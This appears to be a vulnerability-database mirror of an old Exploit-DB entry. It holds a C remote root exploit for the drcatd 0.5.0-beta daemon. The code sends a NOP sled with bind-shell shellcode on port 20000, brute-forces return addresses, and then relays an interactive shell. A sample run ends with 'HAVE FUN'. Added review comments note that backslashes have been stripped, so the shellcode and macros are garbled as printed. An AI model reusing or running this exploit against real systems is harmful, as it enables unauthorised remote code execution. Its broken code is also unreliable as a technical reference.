Drcat 0.5.0-beta – ‘drcatd’ Remote Code Execution


漏洞ID 1054540 漏洞类型
发布时间 2004-07-22 更新时间 2004-07-22
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/359
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*

Proof of Concept DRCATD Remote exploit
                               by Taif
__
Test:
[root@localhost drcat]# ./drcat -d 127.0.0.1 -u taif -p test
Public code by Taif
drcat-0.5.0-beta ('remote r00t' proof)
Bug found by Khan Shirani

host: +-+-+-+-+-+-+-+
      127.0.0.1 |C|L|U|P|C|S|R|
user: |O|O|S|A|O|E|O|
           taif |O|G|E|S|D|N|O|
password: |N|O|R|S|E|D|T|
           test | | | | | | | |
---------retaddr---+-+-+-+-+-+-+-+
       bfefc000 * * * * * * X
       bfefbfd1 * * * * * * X
       bfefbfa2 * * * * * * X
       bfefbf73 * * * * * * X
       bfefbf44 * * * * * * X
       bfefbf15 * * * * * * X
       bfefbee6 * * * * * * X
       bfefbeb7 * * * * * * X
       bfefbe88 * * * * * * X
       bfefbe59 * * * * * * X
       bfefbe2a * * * * * * X
       bfefbdfb * * * * * * X
       bfefbdcc * * * * * * X
       bfefbd9d * * * * * * X
       bfefbd6e * * * * * * X
       bfefbd3f * * * * * * X
       bfefbd10 * * * * * * X
       bfefbce1 * * * * * * X
       bfefbcb2 * * * * * * X
       bfefbc83 * * * * * * X
       bfefbc54 * * * * * * X
       bfefbc25 * * * * * * X
       bfefbbf6 * * * * * * X
       bfefbbc7 * * * * * * X
       bfefbb98 * * * * * * X
       bfefbb69 * * * * * * X
       bfefbb3a * * * * * * X
       bfefbb0b * * * * * * X
       bfefbadc * * * * * * X
       bfefbaad * * * * * * X
       bfefba7e * * * * * * X
       bfefba4f * * * * * * X
       bfefba20 * * * * * * X
       bfefb9f1 * * * * * * X
       bfefb9c2 * * * * * * X
       bfefb993 * * * * * * X
       bfefb964 * * * * * * X
       bfefb935 * * * * * * X
       bfefb906 * * * * * * X
       bfefb8d7 * * * * * * X
       bfefb8a8 * * * * * * X
       bfefb879 * * * * * * X
       bfefb84a * * * * * * X
       bfefb81b * * * * * * X
       bfefb7ec * * * * * * X
       bfefb7bd * * * * * * X
       bfefb78e * * * * * * X
       bfefb75f * * * * * * X
       bfefb730 * * * * * * X
       bfefb701 * * * * * * X
       bfefb6d2 * * * * * * X
       bfefb6a3 * * * * * * X
       bfefb674 * * * * * * X
       bfefb645 * * * * * * X
       bfefb616 * * * * * * X
       bfefb5e7 * * * * * * X
       bfefb5b8 * * * * * * X
       bfefb589 * * * * * * X
       bfefb55a * * * * * * X
       bfefb52b * * * * * * X
       bfefb4fc * * * * * * *
* HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN *
Linux localhost.localdomain 2.4.26 #9 P ?ec 2 09:20:29 CEST 2004 i686 athlon i386 GNU/Linux
uid=500(taif) gid=500(taif) groups=500(taif)
10:04pm up 1:00, 1 user, load average: 0.42, 0.35, 0.20
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
....


NOTE:
Use this at your own risk!!
This exploit is unnecessary!!
*/


#include <stdio.h>
#include <netdb.h>
#include <unistd.h>

#define MAXDATASIZE (1024 * 4)

/* Color palette ... i love colors;) */
/* NOTE(review): every backslash has been lost in this copy of the listing,
 * so these read as "E[33m" etc. where an ESC-prefixed ANSI sequence was
 * presumably intended; the same loss shows up as a bare "n" wherever "\n"
 * stood in the string literals below. */
#define YELLOW "E[33m"
#define GREEN "E[32m"
#define RED "E[31m"
#define RESTORE "E[0m"


/* Colored-print helpers: print `string` wrapped in a color code, then flush.
 * NOTE(review): as printed, each #define ends on its first line and the
 * printf()/fflush() lines that follow are not part of the macro (the
 * line-continuation backslashes are missing), so PRINT* expands to nothing
 * and those statements stand alone at file scope. */
#define PRINTGREEN(string) 
       printf("%s%s%s",GREEN,string,RESTORE); 
       fflush(stdout);

#define PRINTRED(string) 
       printf("%s%s%s",RED,string,RESTORE); 
       fflush(stdout);

#define PRINTYELLOW(string) 
       printf("%s%s%s",YELLOW,string,RESTORE); 
       fflush(stdout);

/* portbind 20000 (by bighawk) *
* +setuid() */
/*
 * Payload bytes that makec0de() copies into the overflow buffer.  The
 * header comment attributes it to bighawk ("portbind 20000" plus a
 * setuid() call); main() later connects to port 20000 to check for it.
 * The per-line comments are the author's intended instructions.
 * NOTE(review): in this copy of the listing the "\x" escapes have lost
 * their backslashes, so e.g. "x31xc0" is six ASCII characters rather than
 * the two bytes the comment names; as printed, code[] is plain text and
 * sizeof(code) does not correspond to the intended payload length.
 */
char code[] =
"x31xc0" /* xorl %eax,%eax */
"x31xdb" /* xorl %ebx,%ebx */
"xb0x17" /* movb $0x17,%al */
"xcdx80" /* int $0x80 */
"x31xdb" /* xor ebx, ebx */
"xf7xe3" /* mul ebx */
"xb0x66" /* mov al, 102 */
"x53" /* push ebx */
"x43" /* inc ebx */
"x53" /* push ebx */
"x43" /* inc ebx */
"x53" /* push ebx */
"x89xe1" /* mov ecx, esp */
"x4b" /* dec ebx */
"xcdx80" /* int 80h */
"x89xc7" /* mov edi, eax */
"x52" /* push edx */
"x66x68x4ex20"/* push word 8270 */
"x43" /* inc ebx */
"x66x53" /* push bx */
"x89xe1" /* mov ecx, esp */
"xb0xef" /* mov al, 239 */
"xf6xd0" /* not al */
"x50" /* push eax */
"x51" /* push ecx */
"x57" /* push edi */
"x89xe1" /* mov ecx, esp */
"xb0x66" /* mov al, 102 */
"xcdx80" /* int 80h */
"xb0x66" /* mov al, 102 */
"x43" /* inc ebx */
"x43" /* inc ebx */
"xcdx80" /* int 80h */
"x50" /* push eax */
"x50" /* push eax */
"x57" /* push edi */
"x89xe1" /* mov ecx, esp */
"x43" /* inc ebx */
"xb0x66" /* mov al, 102 */
"xcdx80" /* int 80h */
"x89xd9" /* mov ecx, ebx */
"x89xc3" /* mov ebx, eax */
"xb0x3f" /* mov al, 63 */
"x49" /* dec ecx */
"xcdx80" /* int 80h */
"x41" /* inc ecx */
"xe2xf8" /* loop lp */
"x51" /* push ecx */
"x68x6ex2fx73x68"/* push dword 68732f6eh */
"x68x2fx2fx62x69"/* push dword 69622f2fh */
"x89xe3" /* mov ebx, esp */
"x51" /* push ecx */
"x53" /* push ebx */
"x89xe1" /* mov ecx, esp */
"xb0xf4" /* mov al, 244 */
"xf6xd0" /* not al */
"xcdx80"; /* int 80h */

/* Write the tool's three-line banner to stderr. */
void banner()
{
fprintf(stderr,"Public code by Taif n"
              "drcat-0.5.0-beta ('remote r00t' proof)n"
              "Bug found by Khan Shirani nn");
}

/*
 * Print the option summary to stderr and terminate the process with
 * status 0 (callers rely on it never returning).
 * @param progname  argv[0], echoed in the "usage:" line.
 * Note: `i` is declared but never used; exit() is called without
 * <stdlib.h> being included (implicit declaration).
 */
void usage (char *progname)
{
int i;
fprintf (stderr, "usage: %s arguments nn"
                "-d hostanme (127.0.0.1) n"
                "-u user (NULL) n"
                "-p password (NULL) n"
                "-P port (3535) n"
                "-t timeout (1000=1s) (300) n"
                "n", progname);


exit (0);
}

/*
 * Open a TCP connection to ip:port.
 * @param ip    hostname or dotted address, resolved with gethostbyname()
 *              (IPv4 only: the first h_addr is copied into an AF_INET
 *              sockaddr_in).
 * @param port  destination port, host byte order.
 * @return      connected socket descriptor, or -1 if connect() fails.
 *              Resolution or socket() failure calls exit(1) instead.
 * Notes: on the -1 path the freshly created socket is not closed (fd leak
 * per failed attempt; main() calls this in a loop).  `addr` is only
 * partially initialized (family/port/addr plus an 8-byte memset of
 * sin_zero).  <sys/socket.h>, <netinet/in.h> and <string.h> are not
 * included, so socket(), connect() and memset() are implicitly declared.
 */
int conn(char *ip,int port)
{
int sock;
struct hostent *host;
struct sockaddr_in addr;

if((host=gethostbyname(ip))==NULL)
 { PRINTRED("Xngethostbyname()n"); exit(1); }

addr.sin_family=AF_INET;
addr.sin_port=htons(port);
addr.sin_addr=*((struct in_addr *)host->h_addr);
memset(&(addr.sin_zero),0,8);


if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
 { PRINTRED("Xnsocket()n"); exit(1); }

/* sizeof(struct sockaddr) is passed rather than sizeof addr */
if(connect(sock,(struct sockaddr *)&addr,sizeof(struct sockaddr))==-1)
 { PRINTRED("Xn"); return(-1);}

return(sock);
}

/*
 * Run the drcatd login exchange on an already connected socket, as this
 * client understands it: read up to 6 bytes and compare them with the
 * banner "drcatd" (green marker on match, yellow otherwise), send the
 * user name, read one status byte ('0' == invalid user), send the
 * password, read one status byte ('0' == invalid password).  Any failure
 * closes the socket and calls exit(1); success simply returns.
 * @param sock  connected socket from conn().
 * @param user  user name, sent with strlen(user) bytes, no terminator.
 * @param pass  password, sent with strlen(pass) bytes, no terminator.
 * Notes: only the first recv() result is checked; the two 1-byte recv()
 * calls ignore `n`, so on a 0 or -1 return buffer[0] still holds the first
 * byte of the earlier banner read.  buffer is zeroed once, so the strcmp()
 * after a 6-byte read is terminated.  strlen()/strcmp() are used without
 * <string.h>.
 */
void login(int sock,char* user,char *pass)
{
char buffer[1024];
int n;

memset(buffer,0,sizeof(buffer));
n=recv(sock, buffer, 6, 0);
if(n<0) { PRINTRED("nrecv()n"); exit(1); }
if(n==6)
 {
 if(strcmp(buffer, "drcatd")) {PRINTYELLOW("* ");}
   else {PRINTGREEN("* ");};
 }
else {PRINTYELLOW("* ");}

if(send(sock, user, strlen(user), 0) == -1)
 {PRINTRED("nsend()n");close(sock);exit(1);}

/* status byte for the user name; return value of recv() not checked */
n=recv(sock, buffer, 1, 0);
if(buffer[0] == '0')
 {
 PRINTRED("XnINVALID USERn");
 close(sock);
 exit(1);
 }
else {PRINTGREEN("* ")};

if(send(sock, pass, strlen(pass), 0) == -1)
 {PRINTRED("send()n");close(sock);exit(1);}

/* status byte for the password; return value of recv() not checked */
n=recv(sock, buffer, 1, 0);
 if(buffer[0] == '0')
 {
 PRINTRED("XnINVALID PASSWORDn");
 close(sock);
 exit(1);
 }
return;
}

/* change with care */
#define TOP 290

/*
 * Fill a 512-byte buffer with the payload main() sends after login:
 * bytes [0,TOP) are set to 0x90, code[] (minus its terminating NUL) is
 * copied so that it ends exactly at offset TOP, and from offset
 * TOP-(ret%4) up to index 503 the value `ret` is stored every 4 bytes.
 * @param haox  caller-supplied buffer of at least 512 bytes
 *              (main() passes buff[MAXDATASIZE]).
 * @param ret   address value repeated across the tail of the buffer.
 * Notes: `*(long *)&haox[i]` is an unaligned, type-punned store and
 * assumes sizeof(long)==4 (a 32-bit target); `i` is an int compared with
 * sizeof(code) (size_t).  If sizeof(code) exceeds TOP, TOP-sizeof(code)
 * wraps as size_t and the first loop indexes far outside haox.
 */
void makec0de(char* haox,unsigned int ret)
{
int i;

memset(haox,0,512);
memset(haox,0x90,TOP);
for (i=0;i<sizeof(code)-1;i++)
haox[TOP-sizeof(code)+i]=code[i];
/* yeah fucking thing (ret%4) */
/* ret%4 shifts the start so the 4-byte stores stay aligned relative to TOP */
for (i=TOP-(ret%4);i<504;i=i+4)
*(long *)&haox[i]=ret;
}

/*
 * Send buffer as a C string: strlen(buffer) bytes, so the transmitted
 * length stops at the first NUL byte in the buffer, not at the 512 bytes
 * makec0de() filled.  On send() failure the socket is closed and the
 * process exits with status 1.
 * @param sock    connected socket.
 * @param buffer  NUL-terminated data to transmit.
 */
void send_it(int sock,char* buffer)
{
int len;

len=strlen(buffer);
if (send(sock, buffer, len, 0) == -1)
 {
 PRINTRED("Xnsend()n");
 close(sock);
 exit(1);
 }
return;
}

/*
 * Relay loop between stdin/stdout and `sock`: first writes the fixed
 * command string in `snd`, then select()s on stdin and the socket,
 * forwarding lines typed on stdin to the socket and echoing socket data
 * to stdout.
 * @param sock  connected socket.
 * @return      0 only if the peer closes before any data was received
 *              (`received` still 0); a later close calls exit(1), and a
 *              read() error also exits.
 * Notes (review): `rset` is never FD_ZERO()ed, so it starts with whatever
 * was on the stack and bits are never cleared between iterations; the
 * return values of select(), write() and fgets() are unchecked; rcv is
 * zeroed but read() may fill all sizeof(rcv) bytes, leaving no terminator
 * for fputs().  bzero()/select() are used without <strings.h>/<sys/select.h>.
 */
int sh(int sock)
{
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
int received = 0;

//strcpy(snd,"TERM=xterm; export TERM=xterm; exec bash -in");
//write(sock, snd, strlen(snd));

strcpy(snd, "uname -a; id; wn");
write(sock, snd, strlen(snd));

for (;;)
{
FD_SET(fileno(stdin), &rset);
FD_SET(sock, &rset);

maxfd = ( ( fileno(stdin) > sock )?fileno(stdin):sock ) + 1;
select(maxfd, &rset, NULL, NULL, NULL);

if (FD_ISSET(fileno(stdin), &rset))
 {
 bzero(snd, sizeof(snd));
 fgets(snd, sizeof(snd)-2, stdin);
 write(sock, snd, strlen(snd));
 }

if (FD_ISSET(sock, &rset))
 {
 bzero(rcv, sizeof(rcv));
 if ((n = read(sock, rcv, sizeof(rcv))) == -1)
   {
   printf("FUCK: Error in readn");
   exit(1);
   }
 if (!n)
   {
   /* EOF from the peer: a "failed" result only if nothing ever arrived */
   if (!received)
     {
     printf("FUCK: failed.nn");
     return 0;
     }
   printf("Connection closed.n");
   exit(1);
   }

 received = 1;
 fputs(rcv, stdout);
 fflush(stdout);
 }
}
}

/*
 * Entry point.  Parses -d/-u/-p/-P/-t, prints the status header, then
 * loops: connect, login(), makec0de() into buff, send_it(), close, sleep
 * `time` milliseconds, and probe port 20000; if that connect succeeds,
 * hand the socket to sh() and exit(0), otherwise lower `ret` by
 * (TOP-sizeof(code))/4 and try again.  The loop has no other exit, so the
 * trailing exit(0) is unreachable.
 * Notes (review): `c` is a char compared with getopt()'s -1, which never
 * matches where char is unsigned; `time` shadows the libc function of the
 * same name; the host==NULL check is dead because host starts as a
 * literal; port and time come from atoi() unchecked; `ret` is an int
 * initialized from an unsigned expression above INT_MAX (the conversion is
 * implementation-defined) and is later mixed with size_t arithmetic.
 */
int main(int argc, char *argv[]){
char buff[MAXDATASIZE];
char *host, *user,*pass,c;
int sockfd,sockfd2;
int port = 3535;
int time = 300;
int ret=0xc0000000-(MAXDATASIZE*260);

host="127.0.0.1";
user=NULL;
pass=NULL;

banner();
if (argc<2) usage (argv[0]);

while((c=getopt(argc,argv,"?hd:u:p:P:t:"))!=-1)
       {
               switch(c)
               {
               case 't':
                               time=atoi(optarg);
                               break;
               case 'P':
                               port=atoi(optarg);
                               break;
               case 'u':
                               user=optarg;
                               break;
               case 'd':
                               host=optarg;
                               break;
               case 'p':
                               pass=optarg;
                               break;
               case '?':
               case 'h':
               default:
                               usage (argv[0]);
                               break;

               }
       }

if (host==NULL)
 {PRINTRED("Set host!n");usage (argv[0]);}
if (user==NULL)
 {PRINTRED("Set user!n");usage (argv[0]);}
if (pass==NULL)
 {PRINTRED("Set password!n");usage (argv[0]);}
 
printf(" host: +-+-+-+-+-+-+-+n"
      "%16s |C|L|U|P|C|S|R|n"
      " user: |O|O|S|A|O|E|O|n"
      "%16s |O|G|E|S|D|N|O|n"
      " password: |N|O|R|S|E|D|T|n"
      "%16s | | | | | | | |n"
      "---------retaddr---+-+-+-+-+-+-+-+n"
      ,host,user,pass);fflush(stdout);
while(1)
{
printf("%16x ",ret);fflush(stdout);
sockfd=conn(host,port);
if (sockfd<0) {PRINTRED("connect()n");exit(1);}
 else PRINTGREEN("* ");
login(sockfd,user,pass);PRINTGREEN("* ");
makec0de(buff,ret);PRINTGREEN("* ");
send_it(sockfd,buff);PRINTGREEN("* ");
close(sockfd);
/* `time` is in milliseconds (see usage); usleep takes microseconds */
usleep(time*1000);
/* probe for the listener the payload is expected to open */
sockfd=conn(host,20000);
if (!(sockfd<0))
 {
 PRINTGREEN("*n");
 PRINTGREEN("* HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN *n");
 sh(sockfd);
 close(sockfd);
 exit(0);
 }
ret=ret-((TOP-sizeof(code))/4);
}
exit(0);

}

// milw0rm.com [2004-07-22]
